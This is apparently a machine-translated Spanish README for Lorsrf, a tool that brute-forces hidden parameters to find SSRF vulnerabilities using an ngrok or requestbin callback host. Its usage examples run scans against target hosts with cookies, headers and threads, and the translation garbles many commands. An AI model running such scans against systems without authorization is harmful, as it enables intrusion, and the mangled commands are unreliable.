Lorsrf se ha agregado a scant3r con adiciones útiles (método multi http, tipo de contenido múltiple (json, consulta, xml, velocidad, Worlist grande y más)). Fuerza bruta en parámetros ocultos para encontrar vulnerabilidades SSRF con GET y POST Métodos
Instalar
➜ Clon de Git https://github.com/knassar702/lorsrf
➜ CD Lorsrf
➜ sudo pip3 instale el pistón
Instale la herramienta Ngrok
pasos
falda
- guía a tu ngrok
./ngrok http 9090 - Correr
server.pyScript y agregue el puerto ngrokpython3 server.py 9090 - Correr
lorsrf.pyy agregue el host ngrok-soportunidad
requestbin.com
- Inicie sesión en https://requestbin.com
- Copie y agregue su host usando
-sOpción (sinserver.pyExpediente)
¿Como puedo usar lo?
Gato YOUR_LIST.txt | python3 lorsrf.py -t URL_TARGET -s YOUR_HOST -w lista de palabras.txt
Ejemplos de
$ cat parameter.txt | python3 lorsrf.py -t http://target.com -shttp: //53252.ngrok.io
Agregar hilos
$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -threads = 50
Agregar tiempo de espera
$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io –Tiempo de espera = 4
Agregar cookies
$ Parámetros de gato.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -c ‘usuario = 5 & PHPSESSION = 5232’
Agregar encabezados desde un archivo de texto
PScat headers.txt
Cookie: prueba = 1
Auth: Basic TG9yU3JmCg ==
$ cat Parameter.txt | python3 lorsrf.py -f headers.txt -s ‘http://myhost.com’ -t ‘http://ssrf.hack.com’
GET /? Parámetro = YOUR_HOST HTTP / 1.1
Alojado por targer.com
Cookie: prueba = 1
Auth: Basic TG9yU3JmCg ==
El reenvío seguirá
$ cat parameter.txt | python3 lorsrf.py -t http://target.com -s http: // 53252.ngrok.io -r
Pruebas
python3 lorsrf.py -t ‘http://testphp.vulnweb.com/showimage.php’ -s ‘https://IHR_HOST.com’ -w parámetros.txt
GIF
